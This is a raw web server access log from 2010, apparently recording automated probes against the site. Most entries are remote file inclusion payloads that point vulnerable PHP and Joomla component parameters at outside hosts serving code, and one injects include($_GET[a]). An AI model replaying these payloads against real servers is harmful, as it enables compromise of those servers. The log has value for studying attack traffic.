67.227.136.138 - - [19/Feb/2010:04:38:24 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:38:24 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:38:59 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:04:39:10 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:04:39:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:04:39:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:04:39:16 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:04:39:16 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:04:39:16 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:39:46 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:39:50 -0800] "GET /logs/access_100210.log%20%20/homepage.php?sel=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:39:53 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:40:07 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:40:07 -0800] "GET /logs/access_100206.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:40:07 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:40:19 -0800] "GET /logs/access_100130.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:40:28 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:40:28 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:40:28 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:40:30 -0800] "GET /logs/access_100130.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:40:30 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:41:30 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.15 - - [19/Feb/2010:04:42:00 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
210.205.6.233 - - [19/Feb/2010:04:42:44 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:42:44 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:42:44 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:42:56 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:04:42:57 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [19/Feb/2010:04:46:34 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:47:36 -0800] "GET /logs//main.php?sayfa=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:47:39 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:47:39 -0800] "GET /main.php?sayfa=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:49:24 -0800] "GET /logs/access_100117.log%20%20/homepage.php?sel=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:50:27 -0800] "GET /logs/access_100130.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:50:52 -0800] "GET /logs/access_100130.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [19/Feb/2010:04:52:00 -0800] "GET /module/services.php HTTP/1.0" 200 3505 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /logs/access_100207.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /logs//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /logs//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:06 -0800] "GET /logs/access_100207.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:11 -0800] "GET /logs/access_100208.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:11 -0800] "GET /logs/access_100204.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:12 -0800] "GET /logs/access_100208.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:54:12 -0800] "GET /logs/access_100204.log%20%20//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:04:54:50 -0800] "GET /logs/access_100117.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:04:54:50 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100117.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:04:54:52 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_100117.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:56:01 -0800] "GET /logs/access_100207.log//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:56:01 -0800] "GET /logs/access_100208.log//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:56:02 -0800] "GET /logs/access_100207.log//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.177.193.190 - - [19/Feb/2010:04:56:02 -0800] "GET /logs/access_100208.log//html/modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:56:26 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:56:35 -0800] "GET /logs/access_100202.log//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:57:00 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:57:00 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:57:06 -0800] "GET /logs/access_100119.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:57:28 -0800] "GET /logs/access_100114.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:57:49 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:57:49 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:57:49 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:58:17 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:58:20 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:58:21 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:58:25 -0800] "GET /logs/access_100119.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:04:58:42 -0800] "GET /logs/access_100114.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:59:01 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:59:01 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:59:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:59:13 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:59:13 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:59:13 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:59:59 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:00:14 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:00:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:00:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:00:26 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:00:34 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:00:34 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:00:34 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:03:25 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:03:25 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:03:25 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:03:59 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:04:08 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:04:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:04:08 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:04:46 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:04:46 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:04:46 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:05:07 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:05:07 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:05:07 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:05:17 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:05:05:37 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:05:38 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:05:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:05:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [19/Feb/2010:05:05:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [19/Feb/2010:05:05:54 -0800] "GET /logs/access_100103.log//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [19/Feb/2010:05:05:54 -0800] "GET /skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:06:37 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:05:06:44 -0800] "GET /logs/scripts.log HTTP/1.0" 200 71218848 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
